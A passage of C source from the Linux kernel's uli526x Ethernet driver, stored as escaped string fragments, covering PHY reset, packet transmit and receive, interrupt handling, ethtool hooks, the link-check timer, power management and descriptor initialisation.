0);\n\n\t/* Reset M526x MAC controller */\n\tuw32(DCR0, ULI526X_RESET);\t/* RESET MAC */\n\tudelay(100);\n\tuw32(DCR0, db->cr0_data);\n\tudelay(5);\n\n\t/* Phy addr : In some boards,M5261/M5263 phy address !", "= 1 */\n\tdb->phy_addr = 1;\n\tfor (phy_tmp = 0; phy_tmp < 32; phy_tmp++) {\n\t\tu16 phy_value;\n\n\t\tphy_value = phy->read(db, phy_tmp, 3);\t//peer add\n\t\tif (phy_value !", "= 0xffff && phy_value !", "= 0) {\n\t\t\tdb->phy_addr = phy_tmp;\n\t\t\tbreak;\n\t\t}\n\t}\n\n\tif (phy_tmp == 32)\n\t\tpr_warn(\"Can not find the phy address!!!\\n\");\n\t/* Parser SROM and media mode */\n\tdb->media_mode = uli526x_media_mode;\n\n\t/* phyxcer capability setting */\n\tphy_reg_reset = phy->read(db, db->phy_addr, 0);\n\tphy_reg_reset = (phy_reg_reset | 0x8000);\n\tphy->write(db, db->phy_addr, 0, phy_reg_reset);\n\n\t/* See IEEE 802.3-2002.pdf (Section 2, Chapter \"22.2.4 Management\n\t * functions\") or phy data sheet for details on phy reset\n\t */\n\tudelay(500);\n\ttimeout = 10;\n\twhile (timeout-- && phy->read(db, db->phy_addr, 0) & 0x8000)\n\t\tudelay(100);\n\n\t/* Process Phyxcer Media Mode */\n\tuli526x_set_phyxcer(db);\n\n\t/* Media Mode Process */\n\tif ( !(", "db->media_mode & ULI526X_AUTO) )\n\t\tdb->op_mode = db->media_mode;\t\t/* Force Mode */\n\n\t/* Initialize Transmit/Receive descriptor and CR3/4 */\n\tuli526x_descriptor_init(dev, ioaddr);\n\n\t/* Init CR6 to program M526X operation */\n\tupdate_cr6(db->cr6_data, ioaddr);\n\n\t/* Send setup frame */\n\tsend_filter_frame(dev, netdev_mc_count(dev));\t/* M5261/M5263 */\n\n\t/* Init CR7, interrupt active bit */\n\tdb->cr7_data = CR7_DEFAULT;\n\tuw32(DCR7, db->cr7_data);\n\n\t/* Init CR15, Tx jabber and Rx watchdog timer */\n\tuw32(DCR15, db->cr15_data);\n\n\t/* Enable ULI526X Tx/Rx function */\n\tdb->cr6_data |= CR6_RXSC | CR6_TXSC;\n\tupdate_cr6(db->cr6_data, ioaddr);\n}\n\n\n/*\n *\tHardware start transmission.", "\n *\tSend a packet to media from the upper layer.", "\n */\n\nstatic netdev_tx_t uli526x_start_xmit(struct sk_buff *skb,\n\t\t\t\t\t struct net_device *dev)\n{\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\tvoid __iomem *ioaddr = db->ioaddr;\n\tstruct tx_desc *txptr;\n\tunsigned long flags;\n\n\tULI526X_DBUG(0, \"uli526x_start_xmit\", 0);\n\n\t/* Resource flag check */\n\tnetif_stop_queue(dev);\n\n\t/* Too large packet check */\n\tif (skb->len > MAX_PACKET_SIZE) {\n\t\tnetdev_err(dev, \"big packet = %d\\n\", (u16)skb->len);\n\t\tdev_kfree_skb_any(skb);\n\t\treturn NETDEV_TX_OK;\n\t}\n\n\tspin_lock_irqsave(&db->lock, flags);\n\n\t/* No Tx resource check, it never happen nromally */\n\tif (db->tx_packet_cnt >= TX_FREE_DESC_CNT) {\n\t\tspin_unlock_irqrestore(&db->lock, flags);\n\t\tnetdev_err(dev, \"No Tx resource %ld\\n\", db->tx_packet_cnt);\n\t\treturn NETDEV_TX_BUSY;\n\t}\n\n\t/* Disable NIC interrupt */\n\tuw32(DCR7, 0);\n\n\t/* transmit this packet */\n\ttxptr = db->tx_insert_ptr;\n\tskb_copy_from_linear_data(skb, txptr->tx_buf_ptr, skb->len);\n\ttxptr->tdes1 = cpu_to_le32(0xe1000000 | skb->len);\n\n\t/* Point to next transmit free descriptor */\n\tdb->tx_insert_ptr = txptr->next_tx_desc;\n\n\t/* Transmit Packet Process */\n\tif (db->tx_packet_cnt < TX_DESC_CNT) {\n\t\ttxptr->tdes0 = cpu_to_le32(0x80000000);\t/* Set owner bit */\n\t\tdb->tx_packet_cnt++;\t\t\t/* Ready to send */\n\t\tuw32(DCR1, 0x1);\t\t\t/* Issue Tx polling */\n\t\tnetif_trans_update(dev);\t\t/* saved time stamp */\n\t}\n\n\t/* Tx resource check */\n\tif ( db->tx_packet_cnt < TX_FREE_DESC_CNT )\n\t\tnetif_wake_queue(dev);\n\n\t/* Restore CR7 to enable interrupt */\n\tspin_unlock_irqrestore(&db->lock, flags);\n\tuw32(DCR7, db->cr7_data);\n\n\t/* free this SKB */\n\tdev_consume_skb_any(skb);\n\n\treturn NETDEV_TX_OK;\n}\n\n\n/*\n *\tStop the interface.", "\n *\tThe interface is stopped when it is brought.", "\n */\n\nstatic int uli526x_stop(struct net_device *dev)\n{\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\tvoid __iomem *ioaddr = db->ioaddr;\n\n\t/* disable system */\n\tnetif_stop_queue(dev);\n\n\t/* deleted timer */\n\tdel_timer_sync(&db->timer);\n\n\t/* Reset & stop ULI526X board */\n\tuw32(DCR0, ULI526X_RESET);\n\tudelay(5);\n\tdb->phy.write(db, db->phy_addr, 0, 0x8000);\n\n\t/* free interrupt */\n\tfree_irq(db->pdev->irq, dev);\n\n\t/* free allocated rx buffer */\n\tuli526x_free_rxbuffer(db);\n\n\treturn 0;\n}\n\n\n/*\n *\tM5261/M5263 insterrupt handler\n *\treceive the packet to upper layer, free the transmitted packet\n */\n\nstatic irqreturn_t uli526x_interrupt(int irq, void *dev_id)\n{\n\tstruct net_device *dev = dev_id;\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\tvoid __iomem *ioaddr = db->ioaddr;\n\tunsigned long flags;\n\n\tspin_lock_irqsave(&db->lock, flags);\n\tuw32(DCR7, 0);\n\n\t/* Got ULI526X status */\n\tdb->cr5_data = ur32(DCR5);\n\tuw32(DCR5, db->cr5_data);\n\tif ( !(", "db->cr5_data & 0x180c1) ) {\n\t\t/* Restore CR7 to enable interrupt mask */\n\t\tuw32(DCR7, db->cr7_data);\n\t\tspin_unlock_irqrestore(&db->lock, flags);\n\t\treturn IRQ_HANDLED;\n\t}\n\n\t/* Check system status */\n\tif (db->cr5_data & 0x2000) {\n\t\t/* system bus error happen */\n\t\tULI526X_DBUG(1, \"System bus error happen. ", "CR5=\", db->cr5_data);\n\t\tdb->reset_fatal++;\n\t\tdb->wait_reset = 1;\t/* Need to RESET */\n\t\tspin_unlock_irqrestore(&db->lock, flags);\n\t\treturn IRQ_HANDLED;\n\t}\n\n\t /* Received the coming packet */\n\tif ( (db->cr5_data & 0x40) && db->rx_avail_cnt )\n\t\tuli526x_rx_packet(dev, db);\n\n\t/* reallocate rx descriptor buffer */\n\tif (db->rx_avail_cnt<RX_DESC_CNT)\n\t\tallocate_rx_buffer(dev);\n\n\t/* Free the transmitted descriptor */\n\tif ( db->cr5_data & 0x01)\n\t\tuli526x_free_tx_pkt(dev, db);\n\n\t/* Restore CR7 to enable interrupt mask */\n\tuw32(DCR7, db->cr7_data);\n\n\tspin_unlock_irqrestore(&db->lock, flags);\n\treturn IRQ_HANDLED;\n}\n\n#ifdef CONFIG_NET_POLL_CONTROLLER\nstatic void uli526x_poll(struct net_device *dev)\n{\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\n\t/* ISR grabs the irqsave lock, so this should be safe */\n\tuli526x_interrupt(db->pdev->irq, dev);\n}\n#endif\n\n/*\n *\tFree TX resource after TX complete\n */\n\nstatic void uli526x_free_tx_pkt(struct net_device *dev,\n\t\t\t\tstruct uli526x_board_info * db)\n{\n\tstruct tx_desc *txptr;\n\tu32 tdes0;\n\n\ttxptr = db->tx_remove_ptr;\n\twhile(db->tx_packet_cnt) {\n\t\ttdes0 = le32_to_cpu(txptr->tdes0);\n\t\tif (tdes0 & 0x80000000)\n\t\t\tbreak;\n\n\t\t/* A packet sent completed */\n\t\tdb->tx_packet_cnt--;\n\t\tdev->stats.tx_packets++;\n\n\t\t/* Transmit statistic counter */\n\t\tif ( tdes0 !", "= 0x7fffffff ) {\n\t\t\tdev->stats.collisions += (tdes0 >> 3) & 0xf;\n\t\t\tdev->stats.tx_bytes += le32_to_cpu(txptr->tdes1) & 0x7ff;\n\t\t\tif (tdes0 & TDES0_ERR_MASK) {\n\t\t\t\tdev->stats.tx_errors++;\n\t\t\t\tif (tdes0 & 0x0002) {\t/* UnderRun */\n\t\t\t\t\tdb->tx_fifo_underrun++;\n\t\t\t\t\tif ( !(", "db->cr6_data & CR6_SFT) ) {\n\t\t\t\t\t\tdb->cr6_data = db->cr6_data | CR6_SFT;\n\t\t\t\t\t\tupdate_cr6(db->cr6_data, db->ioaddr);\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t\tif (tdes0 & 0x0100)\n\t\t\t\t\tdb->tx_excessive_collision++;\n\t\t\t\tif (tdes0 & 0x0200)\n\t\t\t\t\tdb->tx_late_collision++;\n\t\t\t\tif (tdes0 & 0x0400)\n\t\t\t\t\tdb->tx_no_carrier++;\n\t\t\t\tif (tdes0 & 0x0800)\n\t\t\t\t\tdb->tx_loss_carrier++;\n\t\t\t\tif (tdes0 & 0x4000)\n\t\t\t\t\tdb->tx_jabber_timeout++;\n\t\t\t}\n\t\t}\n\n \t\ttxptr = txptr->next_tx_desc;\n\t}/* End of while */\n\n\t/* Update TX remove pointer to next */\n\tdb->tx_remove_ptr = txptr;\n\n\t/* Resource available check */\n\tif ( db->tx_packet_cnt < TX_WAKE_DESC_CNT )\n\t\tnetif_wake_queue(dev);\t/* Active upper layer, send again */\n}\n\n\n/*\n *\tReceive the come packet and pass to upper layer\n */\n\nstatic void uli526x_rx_packet(struct net_device *dev, struct uli526x_board_info * db)\n{\n\tstruct rx_desc *rxptr;\n\tstruct sk_buff *skb;\n\tint rxlen;\n\tu32 rdes0;\n\n\trxptr = db->rx_ready_ptr;\n\n\twhile(db->rx_avail_cnt) {\n\t\trdes0 = le32_to_cpu(rxptr->rdes0);\n\t\tif (rdes0 & 0x80000000)\t/* packet owner check */\n\t\t{\n\t\t\tbreak;\n\t\t}\n\n\t\tdb->rx_avail_cnt--;\n\t\tdb->interval_rx_cnt++;\n\n\t\tpci_unmap_single(db->pdev, le32_to_cpu(rxptr->rdes2), RX_ALLOC_SIZE, PCI_DMA_FROMDEVICE);\n\t\tif ( (rdes0 & 0x300) !", "= 0x300) {\n\t\t\t/* A packet without First/Last flag */\n\t\t\t/* reuse this SKB */\n\t\t\tULI526X_DBUG(0, \"Reuse SK buffer, rdes0\", rdes0);\n\t\t\tuli526x_reuse_skb(db, rxptr->rx_skb_ptr);\n\t\t} else {\n\t\t\t/* A packet with First/Last flag */\n\t\t\trxlen = ( (rdes0 >> 16) & 0x3fff) - 4;\n\n\t\t\t/* error summary bit check */\n\t\t\tif (rdes0 & 0x8000) {\n\t\t\t\t/* This is a error packet */\n\t\t\t\tdev->stats.rx_errors++;\n\t\t\t\tif (rdes0 & 1)\n\t\t\t\t\tdev->stats.rx_fifo_errors++;\n\t\t\t\tif (rdes0 & 2)\n\t\t\t\t\tdev->stats.rx_crc_errors++;\n\t\t\t\tif (rdes0 & 0x80)\n\t\t\t\t\tdev->stats.rx_length_errors++;\n\t\t\t}\n\n\t\t\tif ( !(", "rdes0 & 0x8000) ||\n\t\t\t\t((db->cr6_data & CR6_PM) && (rxlen>6)) ) {\n\t\t\t\tstruct sk_buff *new_skb = NULL;\n\n\t\t\t\tskb = rxptr->rx_skb_ptr;\n\n\t\t\t\t/* Good packet, send to upper layer */\n\t\t\t\t/* Shorst packet used new SKB */\n\t\t\t\tif ((rxlen < RX_COPY_SIZE) &&\n\t\t\t\t (((new_skb = netdev_alloc_skb(dev, rxlen + 2)) !", "= NULL))) {\n\t\t\t\t\tskb = new_skb;\n\t\t\t\t\t/* size less than COPY_SIZE, allocate a rxlen SKB */\n\t\t\t\t\tskb_reserve(skb, 2); /* 16byte align */\n\t\t\t\t\tskb_put_data(skb,\n\t\t\t\t\t\t skb_tail_pointer(rxptr->rx_skb_ptr),\n\t\t\t\t\t\t rxlen);\n\t\t\t\t\tuli526x_reuse_skb(db, rxptr->rx_skb_ptr);\n\t\t\t\t} else\n\t\t\t\t\tskb_put(skb, rxlen);\n\n\t\t\t\tskb->protocol = eth_type_trans(skb, dev);\n\t\t\t\tnetif_rx(skb);\n\t\t\t\tdev->stats.rx_packets++;\n\t\t\t\tdev->stats.rx_bytes += rxlen;\n\n\t\t\t} else {\n\t\t\t\t/* Reuse SKB buffer when the packet is error */\n\t\t\t\tULI526X_DBUG(0, \"Reuse SK buffer, rdes0\", rdes0);\n\t\t\t\tuli526x_reuse_skb(db, rxptr->rx_skb_ptr);\n\t\t\t}\n\t\t}\n\n\t\trxptr = rxptr->next_rx_desc;\n\t}\n\n\tdb->rx_ready_ptr = rxptr;\n}\n\n\n/*\n * Set ULI526X multicast address\n */\n\nstatic void uli526x_set_filter_mode(struct net_device * dev)\n{\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\tunsigned long flags;\n\n\tULI526X_DBUG(0, \"uli526x_set_filter_mode()\", 0);\n\tspin_lock_irqsave(&db->lock, flags);\n\n\tif (dev->flags & IFF_PROMISC) {\n\t\tULI526X_DBUG(0, \"Enable PROM Mode\", 0);\n\t\tdb->cr6_data |= CR6_PM | CR6_PBF;\n\t\tupdate_cr6(db->cr6_data, db->ioaddr);\n\t\tspin_unlock_irqrestore(&db->lock, flags);\n\t\treturn;\n\t}\n\n\tif (dev->flags & IFF_ALLMULTI ||\n\t netdev_mc_count(dev) > ULI5261_MAX_MULTICAST) {\n\t\tULI526X_DBUG(0, \"Pass all multicast address\",\n\t\t\t netdev_mc_count(dev));\n\t\tdb->cr6_data &= ~(CR6_PM | CR6_PBF);\n\t\tdb->cr6_data |= CR6_PAM;\n\t\tspin_unlock_irqrestore(&db->lock, flags);\n\t\treturn;\n\t}\n\n\tULI526X_DBUG(0, \"Set multicast address\", netdev_mc_count(dev));\n\tsend_filter_frame(dev, netdev_mc_count(dev)); \t/* M5261/M5263 */\n\tspin_unlock_irqrestore(&db->lock, flags);\n}\n\nstatic void\nULi_ethtool_get_link_ksettings(struct uli526x_board_info *db,\n\t\t\t struct ethtool_link_ksettings *cmd)\n{\n\tu32 supported, advertising;\n\n\tsupported = (SUPPORTED_10baseT_Half |\n\t SUPPORTED_10baseT_Full |\n\t SUPPORTED_100baseT_Half |\n\t SUPPORTED_100baseT_Full |\n\t SUPPORTED_Autoneg |\n\t SUPPORTED_MII);\n\n\tadvertising = (ADVERTISED_10baseT_Half |\n\t ADVERTISED_10baseT_Full |\n\t ADVERTISED_100baseT_Half |\n\t ADVERTISED_100baseT_Full |\n\t ADVERTISED_Autoneg |\n\t ADVERTISED_MII);\n\n\tethtool_convert_legacy_u32_to_link_mode(cmd->link_modes.supported,\n\t\t\t\t\t\tsupported);\n\tethtool_convert_legacy_u32_to_link_mode(cmd->link_modes.advertising,\n\t\t\t\t\t\tadvertising);\n\n\tcmd->base.port = PORT_MII;\n\tcmd->base.phy_address = db->phy_addr;\n\n\tcmd->base.speed = SPEED_10;\n\tcmd->base.duplex = DUPLEX_HALF;\n\n\tif(db->op_mode==ULI526X_100MHF || db->op_mode==ULI526X_100MFD)\n\t{\n\t\tcmd->base.speed = SPEED_100;\n\t}\n\tif(db->op_mode==ULI526X_10MFD || db->op_mode==ULI526X_100MFD)\n\t{\n\t\tcmd->base.duplex = DUPLEX_FULL;\n\t}\n\tif(db->link_failed)\n\t{\n\t\tcmd->base.speed = SPEED_UNKNOWN;\n\t\tcmd->base.duplex = DUPLEX_UNKNOWN;\n\t}\n\n\tif (db->media_mode & ULI526X_AUTO)\n\t{\n\t\tcmd->base.autoneg = AUTONEG_ENABLE;\n\t}\n}\n\nstatic void netdev_get_drvinfo(struct net_device *dev,\n\t\t\t struct ethtool_drvinfo *info)\n{\n\tstruct uli526x_board_info *np = netdev_priv(dev);\n\n\tstrlcpy(info->driver, DRV_NAME, sizeof(info->driver));\n\tstrlcpy(info->bus_info, pci_name(np->pdev), sizeof(info->bus_info));\n}\n\nstatic int netdev_get_link_ksettings(struct net_device *dev,\n\t\t\t\t struct ethtool_link_ksettings *cmd)\n{\n\tstruct uli526x_board_info *np = netdev_priv(dev);\n\n\tULi_ethtool_get_link_ksettings(np, cmd);\n\n\treturn 0;\n}\n\nstatic u32 netdev_get_link(struct net_device *dev) {\n\tstruct uli526x_board_info *np = netdev_priv(dev);\n\n\tif(np->link_failed)\n\t\treturn 0;\n\telse\n\t\treturn 1;\n}\n\nstatic void uli526x_get_wol(struct net_device *dev, struct ethtool_wolinfo *wol)\n{\n\twol->supported = WAKE_PHY | WAKE_MAGIC;\n\twol->wolopts = 0;\n}\n\nstatic const struct ethtool_ops netdev_ethtool_ops = {\n\t.get_drvinfo\t\t= netdev_get_drvinfo,\n\t.get_link\t\t= netdev_get_link,\n\t.get_wol\t\t= uli526x_get_wol,\n\t.get_link_ksettings\t= netdev_get_link_ksettings,\n};\n\n/*\n *\tA periodic timer routine\n *\tDynamic media sense, allocate Rx buffer...\n */\n\nstatic void uli526x_timer(struct timer_list *t)\n{\n\tstruct uli526x_board_info *db = from_timer(db, t, timer);\n\tstruct net_device *dev = pci_get_drvdata(db->pdev);\n\tstruct uli_phy_ops *phy = &db->phy;\n\tvoid __iomem *ioaddr = db->ioaddr;\n \tunsigned long flags;\n\tu8 tmp_cr12 = 0;\n\tu32 tmp_cr8;\n\n\t//ULI526X_DBUG(0, \"uli526x_timer()\", 0);\n\tspin_lock_irqsave(&db->lock, flags);\n\n\n\t/* Dynamic reset ULI526X : system error or transmit time-out */\n\ttmp_cr8 = ur32(DCR8);\n\tif ( (db->interval_rx_cnt==0) && (tmp_cr8) ) {\n\t\tdb->reset_cr8++;\n\t\tdb->wait_reset = 1;\n\t}\n\tdb->interval_rx_cnt = 0;\n\n\t/* TX polling kick monitor */\n\tif ( db->tx_packet_cnt &&\n\t time_after(jiffies, dev_trans_start(dev) + ULI526X_TX_KICK) ) {\n\t\tuw32(DCR1, 0x1); // Tx polling again\n\n\t\t// TX Timeout\n\t\tif ( time_after(jiffies, dev_trans_start(dev) + ULI526X_TX_TIMEOUT) ) {\n\t\t\tdb->reset_TXtimeout++;\n\t\t\tdb->wait_reset = 1;\n\t\t\tnetdev_err(dev, \" Tx timeout - resetting\\n\");\n\t\t}\n\t}\n\n\tif (db->wait_reset) {\n\t\tULI526X_DBUG(0, \"Dynamic Reset device\", db->tx_packet_cnt);\n\t\tdb->reset_count++;\n\t\tuli526x_dynamic_reset(dev);\n\t\tdb->timer.expires = ULI526X_TIMER_WUT;\n\t\tadd_timer(&db->timer);\n\t\tspin_unlock_irqrestore(&db->lock, flags);\n\t\treturn;\n\t}\n\n\t/* Link status check, Dynamic media type change */\n\tif ((phy->read(db, db->phy_addr, 5) & 0x01e0)!=0)\n\t\ttmp_cr12 = 3;\n\n\tif ( !(", "tmp_cr12 & 0x3) && !", "db->link_failed ) {\n\t\t/* Link Failed */\n\t\tULI526X_DBUG(0, \"Link Failed\", tmp_cr12);\n\t\tnetif_carrier_off(dev);\n\t\tnetdev_info(dev, \"NIC Link is Down\\n\");\n\t\tdb->link_failed = 1;\n\n\t\t/* For Force 10/100M Half/Full mode: Enable Auto-Nego mode */\n\t\t/* AUTO don't need */\n\t\tif ( !(", "db->media_mode & 0x8) )\n\t\t\tphy->write(db, db->phy_addr, 0, 0x1000);\n\n\t\t/* AUTO mode, if INT phyxcer link failed, select EXT device */\n\t\tif (db->media_mode & ULI526X_AUTO) {\n\t\t\tdb->cr6_data&=~0x00000200;\t/* bit9=0, HD mode */\n\t\t\tupdate_cr6(db->cr6_data, db->ioaddr);\n\t\t}\n\t} else\n\t\tif ((tmp_cr12 & 0x3) && db->link_failed) {\n\t\t\tULI526X_DBUG(0, \"Link link OK\", tmp_cr12);\n\t\t\tdb->link_failed = 0;\n\n\t\t\t/* Auto Sense Speed */\n\t\t\tif ( (db->media_mode & ULI526X_AUTO) &&\n\t\t\t\tuli526x_sense_speed(db) )\n\t\t\t\tdb->link_failed = 1;\n\t\t\tuli526x_process_mode(db);\n\n\t\t\tif(db->link_failed==0)\n\t\t\t{\n\t\t\t\tnetdev_info(dev, \"NIC Link is Up %d Mbps %s duplex\\n\",\n\t\t\t\t\t (db->op_mode == ULI526X_100MHF ||\n\t\t\t\t\t db->op_mode == ULI526X_100MFD)\n\t\t\t\t\t ? ", "100 : 10,\n\t\t\t\t\t (db->op_mode == ULI526X_10MFD ||\n\t\t\t\t\t db->op_mode == ULI526X_100MFD)\n\t\t\t\t\t ? \"", "Full\" : \"Half\");\n\t\t\t\tnetif_carrier_on(dev);\n\t\t\t}\n\t\t\t/* SHOW_MEDIA_TYPE(db->op_mode); */\n\t\t}\n\t\telse if(!(tmp_cr12 & 0x3) && db->link_failed)\n\t\t{\n\t\t\tif(db->init==1)\n\t\t\t{\n\t\t\t\tnetdev_info(dev, \"NIC Link is Down\\n\");\n\t\t\t\tnetif_carrier_off(dev);\n\t\t\t}\n\t\t}\n\tdb->init = 0;\n\n\t/* Timer active again */\n\tdb->timer.expires = ULI526X_TIMER_WUT;\n\tadd_timer(&db->timer);\n\tspin_unlock_irqrestore(&db->lock, flags);\n}\n\n\n/*\n *\tStop ULI526X board\n *\tFree Tx/Rx allocated memory\n *\tInit system variable\n */\n\nstatic void uli526x_reset_prepare(struct net_device *dev)\n{\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\tvoid __iomem *ioaddr = db->ioaddr;\n\n\t/* Sopt MAC controller */\n\tdb->cr6_data &= ~(CR6_RXSC | CR6_TXSC);\t/* Disable Tx/Rx */\n\tupdate_cr6(db->cr6_data, ioaddr);\n\tuw32(DCR7, 0);\t\t\t\t/* Disable Interrupt */\n\tuw32(DCR5, ur32(DCR5));\n\n\t/* Disable upper layer interface */\n\tnetif_stop_queue(dev);\n\n\t/* Free Rx Allocate buffer */\n\tuli526x_free_rxbuffer(db);\n\n\t/* system variable init */\n\tdb->tx_packet_cnt = 0;\n\tdb->rx_avail_cnt = 0;\n\tdb->link_failed = 1;\n\tdb->init=1;\n\tdb->wait_reset = 0;\n}\n\n\n/*\n *\tDynamic reset the ULI526X board\n *\tStop ULI526X board\n *\tFree Tx/Rx allocated memory\n *\tReset ULI526X board\n *\tRe-initialize ULI526X board\n */\n\nstatic void uli526x_dynamic_reset(struct net_device *dev)\n{\n\tULI526X_DBUG(0, \"uli526x_dynamic_reset()\", 0);\n\n\tuli526x_reset_prepare(dev);\n\n\t/* Re-initialize ULI526X board */\n\tuli526x_init(dev);\n\n\t/* Restart upper layer interface */\n\tnetif_wake_queue(dev);\n}\n\n\n#ifdef CONFIG_PM\n\n/*\n *\tSuspend the interface.", "\n */\n\nstatic int uli526x_suspend(struct pci_dev *pdev, pm_message_t state)\n{\n\tstruct net_device *dev = pci_get_drvdata(pdev);\n\tpci_power_t power_state;\n\tint err;\n\n\tULI526X_DBUG(0, \"uli526x_suspend\", 0);\n\n\tpci_save_state(pdev);\n\n\tif (!", "netif_running(dev))\n\t\treturn 0;\n\n\tnetif_device_detach(dev);\n\tuli526x_reset_prepare(dev);\n\n\tpower_state = pci_choose_state(pdev, state);\n\tpci_enable_wake(pdev, power_state, 0);\n\terr = pci_set_power_state(pdev, power_state);\n\tif (err) {\n\t\tnetif_device_attach(dev);\n\t\t/* Re-initialize ULI526X board */\n\t\tuli526x_init(dev);\n\t\t/* Restart upper layer interface */\n\t\tnetif_wake_queue(dev);\n\t}\n\n\treturn err;\n}\n\n/*\n *\tResume the interface.", "\n */\n\nstatic int uli526x_resume(struct pci_dev *pdev)\n{\n\tstruct net_device *dev = pci_get_drvdata(pdev);\n\tint err;\n\n\tULI526X_DBUG(0, \"uli526x_resume\", 0);\n\n\tpci_restore_state(pdev);\n\n\tif (!", "netif_running(dev))\n\t\treturn 0;\n\n\terr = pci_set_power_state(pdev, PCI_D0);\n\tif (err) {\n\t\tnetdev_warn(dev, \"Could not put device into D0\\n\");\n\t\treturn err;\n\t}\n\n\tnetif_device_attach(dev);\n\t/* Re-initialize ULI526X board */\n\tuli526x_init(dev);\n\t/* Restart upper layer interface */\n\tnetif_wake_queue(dev);\n\n\treturn 0;\n}\n\n#else /* !", "CONFIG_PM */\n\n#define uli526x_suspend\tNULL\n#define uli526x_resume\tNULL\n\n#endif /* !", "CONFIG_PM */\n\n\n/*\n *\tfree all allocated rx buffer\n */\n\nstatic void uli526x_free_rxbuffer(struct uli526x_board_info * db)\n{\n\tULI526X_DBUG(0, \"uli526x_free_rxbuffer()\", 0);\n\n\t/* free allocated rx buffer */\n\twhile (db->rx_avail_cnt) {\n\t\tdev_kfree_skb(db->rx_ready_ptr->rx_skb_ptr);\n\t\tdb->rx_ready_ptr = db->rx_ready_ptr->next_rx_desc;\n\t\tdb->rx_avail_cnt--;\n\t}\n}\n\n\n/*\n *\tReuse the SK buffer\n */\n\nstatic void uli526x_reuse_skb(struct uli526x_board_info *db, struct sk_buff * skb)\n{\n\tstruct rx_desc *rxptr = db->rx_insert_ptr;\n\n\tif (!(", "rxptr->rdes0 & cpu_to_le32(0x80000000))) {\n\t\trxptr->rx_skb_ptr = skb;\n\t\trxptr->rdes2 = cpu_to_le32(pci_map_single(db->pdev,\n\t\t\t\t\t\t\t skb_tail_pointer(skb),\n\t\t\t\t\t\t\t RX_ALLOC_SIZE,\n\t\t\t\t\t\t\t PCI_DMA_FROMDEVICE));\n\t\twmb();\n\t\trxptr->rdes0 = cpu_to_le32(0x80000000);\n\t\tdb->rx_avail_cnt++;\n\t\tdb->rx_insert_ptr = rxptr->next_rx_desc;\n\t} else\n\t\tULI526X_DBUG(0, \"SK Buffer reuse method error\", db->rx_avail_cnt);\n}\n\n\n/*\n *\tInitialize transmit/Receive descriptor\n *\tUsing Chain structure, and allocate Tx/Rx buffer\n */\n\nstatic void uli526x_descriptor_init(struct net_device *dev, void __iomem *ioaddr)\n{\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\tstruct tx_desc *tmp_tx;\n\tstruct rx_desc *tmp_rx;\n\tunsigned char *tmp_buf;\n\tdma_addr_t tmp_tx_dma, tmp_rx_dma;\n\tdma_addr_t tmp_buf_dma;\n\tint i;\n\n\tULI526X_DBUG(0, \"uli526x_descriptor_init()\", 0);\n\n\t/* tx descriptor start pointer */\n\tdb->tx_insert_ptr = db->first_tx_desc;\n\tdb->tx_remove_ptr = db->first_tx_desc;\n\tuw32(DCR4, db->first_tx_desc_dma);\t/* TX DESC address */\n\n\t/* rx descriptor start pointer */\n\tdb->first_rx_desc = (void *)db->first_tx_desc + sizeof(struct tx_desc) * TX_DESC_CNT;\n\tdb->first_rx_desc_dma = db->first_tx_desc_dma + sizeof(struct tx_desc) * TX_DESC_CNT;\n\tdb->rx_insert_ptr = db->first_rx_desc;\n\tdb->rx_ready_ptr = db->first_rx_desc;\n\tuw32(DCR3, db->first_rx_desc_dma);\t/* RX DESC address */\n\n\t/* Init Transmit chain */\n\ttmp_buf = db->buf_pool_start;\n\ttmp_buf_dma = db->buf_pool_dma_start;\n\ttmp_tx_dma = db->first_tx_desc_dma;\n\tfor (tmp_tx = db->first_tx_desc, i = 0; i < TX_DESC_CNT; i++, tmp_tx++) {\n\t\ttmp_tx->tx_buf_ptr = tmp_buf;\n\t\ttmp_tx->tdes0 = cpu_to_le32(0);\n\t\ttmp_tx->tdes1 = cpu_to_le32(0x81000000);\t/* IC, chain */\n\t\ttmp_tx->tdes2 = cpu_to_le32(tmp_buf_dma);\n\t\ttmp_tx_dma += sizeof(struct tx_desc);\n\t\ttmp_tx->tdes3 = cpu_to_le32(tmp_tx_dma);\n\t\ttmp_tx->next_tx_desc = tmp_tx + 1;\n\t\ttmp_buf = tmp_buf + TX_BUF_ALLOC;\n\t\ttmp_buf_dma = tmp_buf_dma + TX_BUF_ALLOC;\n\t}\n\t(--tmp_tx)->tdes3 = cpu_to_le32(db->first_tx_desc_dma);\n\ttmp_tx->next_tx_desc = db->first_tx_desc;\n\n\t /* Init Receive descriptor chain */\n\ttmp_rx_dma=db->first_rx_desc_dma;\n\tfor (tmp_rx = db->first_rx_desc, i = 0; i < RX_DESC_CNT; i++, tmp_rx++) {\n\t\ttmp_rx->rdes0 = cpu_to_le32(0);\n\t\ttmp_rx->rdes1 = cpu_to_le32(0x01000600);\n\t\ttmp_rx_dma += sizeof(struct rx_desc);\n\t\ttmp_rx->rdes3 = cpu_to_le32(tmp_rx_dma);\n\t\ttmp_rx->next_rx_desc = tmp_rx + 1;\n\t}\n\t(--tmp_rx)->rdes3 = cpu_to_le32(db->first_rx_desc_dma);\n\ttmp_rx->next_rx_desc = db->first_rx_desc;\n\n\t/* pre-allocate Rx buffer */\n\tallocate_rx_buffer(dev);\n}\n\n\n/*\n *\tUpdate CR6 value\n *\tFirstly stop ULI526X, then written value and start\n */\nstatic void update_cr6(u32 cr6_data, void __iomem *ioaddr)\n{\n\tuw32(DCR6, cr6_data);\n\tudelay(5);\n}\n\n\n/*\n *\tSend a setup frame for M5261/M5263\n *\tThis setup frame initialize ULI526X address filter mode\n */\n\n#ifdef __BIG_ENDIAN\n#define FLT_SHIFT 16\n#else\n#define FLT_SHIFT 0\n#endif\n\nstatic void send_filter_frame(struct net_device *dev, int mc_cnt)\n{\n\tstruct uli526x_board_info *db = netdev_priv(dev);\n\tvoid __iomem *ioaddr = db->ioaddr;\n\tstruct netdev_hw_addr *ha;\n\tstruct tx_desc *txptr;\n\tu16 * addrptr;\n\tu32 * suptr;\n\tint i;\n\n\tULI526X_DBUG(0, \"send_filter_frame()\", 0);\n\n\ttxptr = db->tx_insert_ptr;\n\tsuptr = (u32 *) txptr->tx_buf_ptr;\n\n\t/* Node address */\n\taddrptr = (u16 *) 